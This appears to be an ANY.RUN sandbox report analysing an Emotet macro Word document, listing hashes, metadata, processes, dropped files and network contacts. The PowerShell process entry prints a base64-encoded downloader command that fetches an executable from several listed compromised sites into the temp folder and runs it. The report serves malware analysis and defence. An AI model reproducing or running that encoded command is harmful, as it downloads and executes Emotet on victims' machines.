File name:

Form - Aug 13, 2020.doc

Full analysis: https://app.any.run/tasks/ea9ddf92-e206-458d-8833-8293e48e86e2
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: August 19, 2020, 02:10:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Velit., Author: Ines Breton, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Aug 13 14:34:00 2020, Last Saved Time/Date: Thu Aug 13 14:34:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 20, Security: 0
MD5:

D5CED59238085FE7E0A4044119138885

SHA1:

E05921CB080BC86975E56ADD750F477648D0FA23

SHA256:

20F5CC9FBF75378DB1D233E17EA0CF7684DDDD9E38FB65A4503ED0F0786EF250

SSDEEP:

3072:Fj6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGkhNbHDVqbw15R6:FHgtEWPsL/aTyT9GkhNbBOw15R6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes settings of System certificates

      • powersheLL.exe (PID: 2248)
  • SUSPICIOUS

    • Creates files in the user directory

      • powersheLL.exe (PID: 2248)
    • Executed via WMI

      • powersheLL.exe (PID: 2248)
    • PowerShell script executed

      • powersheLL.exe (PID: 2248)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2808)
    • Reads settings of System Certificates

      • powersheLL.exe (PID: 2248)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2808)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Velit.
Subject: -
Author: Ines Breton
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:08:13 13:34:00
ModifyDate: 2020:08:13 13:34:00
Pages: 1
Words: 3
Characters: 20
Security: None
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 22
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2248powersheLL -e JABJAEwAQwBVAFUAZgBoAGQAPQAnAFcASwBXAEYAUgBzAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAYABVAHIAaQB0AHkAcABgAFIAbwB0AE8AYwBvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABQAFUATABHAEwAbwBiAHMAIAA9ACAAJwBNAGUAcQBoACcAOwAkAEsAVwBBAFEAWQB5AHUAcwA9ACcAVgBJAEMAUQBHAGoAbwBuACcAOwAkAEoASQBDAE0ASAB2AG0AZgA9ACQAZQBuAHYAOgB0AGUAbQBwACsAJwBcACcAKwAkAFAAVQBMAEcATABvAGIAcwArACcALgBlAHgAZQAnADsAJABGAEQAQwBQAFUAbgBrAGQAPQAnAEMAWgBDAFcAQwBsAHAAYQAnADsAJABIAFgAQQBRAEoAbwB1AHUAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAOwAkAEQATwBOAFgAQgBrAGYAdAA9ACcAaAB0AHQAcABzADoALwAvAHMAdABhAHIAZABhAHQAYQAuAGkAdAAvAGcAaAB3AGwAdgAvAE4AYwBFAG0AaAAwADAANAA1ADgALwAqAGgAdAB0AHAAOgAvAC8AcwBhAG0AZQBsAGkAbQBhAHIAawBlAHQALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFcAMQBWAC8AKgBoAHQAdABwADoALwAvAHAAcgBvAGQAdQBjAHQAYgBlAGYAbwByAGUAYgB1AHkAaQBuAGcALgBjAG8AbQAvAHcAbwByAGQAcAByAGUAcwBzAC8AbgB4ADUAUgBYAHYAaQBXAGgAdgAvACoAaAB0AHQAcAA6AC8ALwBtAGEAaQBuAGEAbgBlAGwAZQBrAHQAcgBpAGsALgBtAGIAYQBrAGwAdQBsAGkALgBjAG8AbQAvAHMAaQB0AGUAcwAvAFEAegBzAHgAZgA0ADUAMwA0ADQALwAqAGgAdAB0AHAAOgAvAC8AcwB0AGUAZgBhAG4AegByAGUAbgBuAGUAcgAuAGMAbwBtAC8AdwBvAHIAZABwAHIAZQBzAHMALwA1ADgAMABJAC8AJwAuACIAcwBwAEwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABVAEQARwBJAEoAegB0AG8APQAnAEMAQQBNAFUAVwB5AGgAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBEAFIAWABCAHYAegByACAAaQBuACAAJABEAE8ATgBYAEIAawBmAHQAKQB7AHQAcgB5AHsAJABIAFgAQQBRAEoAbwB1AHUALgAiAGQAbwBXAGAATgBMAE8AYQBkAGAARgBJAGAAbABlACIAKAAkAEEARABSAFgAQgB2AHoAcgAsACAAJABKAEkAQwBNAEgAdgBtAGYAKQA7ACQAUABWAEIATQBGAHYAZgByAD0AJwBBAFoARgBRAEIAZgBkAHUAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABKAEkAQwBNAEgAdgBtAGYAKQAuACIATABlAE4AYABHAFQASAAiACAALQBnAGUAIAAyADcANQA3ADgAKQAgAHsAJgAoACcASQAnACsAJwBuAHYAbwAnACsAJwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAoACQASgBJAEMATQBIAHYAbQBmACkAOwAkAFcAVQBDAFYARwB6AGgAZAA9ACcASQBEAEQAUABSAGgAYQBlACcAOwBiAHIAZQBhAGsAOwAkAEkAWQBLAEMAUwBnAHQAcAA9ACcATQBaAEcAUQBCAG8AcABvACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE4AWgBVAE0AWABzAHoAaQA9ACcAWABKAE8ASgBBAGIAeQBtACcAC:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2808"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Form - Aug 13, 2020.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
Total events
1 868
Read events
1 136
Write events
656
Delete events
76

Modification events

(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:w,9
Value:
772C3900F80A0000010000000000000000000000
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(2808) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
3
Text files
0
Unknown types
4

Dropped files

PID
Process
Filename
Type
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR877.tmp.cvr
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF540FE01BFAC27918.TMP
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF263BEFEAE375A47B.TMP
MD5:
SHA256:
2248powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1IFR03LURSDSVEJ47N7V.temp
MD5:
SHA256:
2248powersheLL.exeC:\Users\admin\AppData\Local\Temp\Meqh.exe
MD5:
SHA256:
2248powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe148d.TMPbinary
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$rm - Aug 13, 2020.docpgc
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
2808WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:
SHA256:
2248powersheLL.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A2ECA083537A02B6158458FF1752C63Fbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
7
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2248
powersheLL.exe
GET
404
202.52.146.121:80
http://mainanelektrik.mbakluli.com/sites/Qzsxf45344/
ID
html
22.6 Kb
suspicious
2248
powersheLL.exe
GET
200
46.4.79.183:80
http://samelimarket.com/cgi-sys/suspendedpage.cgi
DE
html
7.45 Kb
suspicious
2248
powersheLL.exe
GET
302
46.4.79.183:80
http://samelimarket.com/wp-includes/W1V/
DE
html
233 b
suspicious
2248
powersheLL.exe
GET
400
188.193.36.65:80
http://stefanzrenner.com/wordpress/580I/
DE
html
452 b
unknown
2248
powersheLL.exe
GET
200
23.37.41.57:80
http://cert.int-x3.letsencrypt.org/
NL
der
1.15 Kb
whitelisted
2248
powersheLL.exe
GET
200
66.96.147.160:80
http://productbeforebuying.com/wordpress/nx5RXviWhv/
US
html
6.27 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2248
powersheLL.exe
23.37.41.57:80
cert.int-x3.letsencrypt.org
Akamai Technologies, Inc.
NL
suspicious
2248
powersheLL.exe
5.9.51.227:443
stardata.it
Hetzner Online GmbH
DE
unknown
2248
powersheLL.exe
46.4.79.183:80
samelimarket.com
Hetzner Online GmbH
DE
malicious
2248
powersheLL.exe
202.52.146.121:80
mainanelektrik.mbakluli.com
Global Media Teknologi, PT
ID
suspicious
2248
powersheLL.exe
66.96.147.160:80
productbeforebuying.com
The Endurance International Group, Inc.
US
malicious
2248
powersheLL.exe
188.193.36.65:80
stefanzrenner.com
Vodafone Kabel Deutschland GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
stardata.it
  • 5.9.51.227
unknown
cert.int-x3.letsencrypt.org
  • 23.37.41.57
whitelisted
www.stardata.it
  • 5.9.51.227
unknown
samelimarket.com
  • 46.4.79.183
suspicious
productbeforebuying.com
  • 66.96.147.160
malicious
mainanelektrik.mbakluli.com
  • 202.52.146.121
suspicious
stefanzrenner.com
  • 188.193.36.65
unknown

Threats

No threats detected
No debug info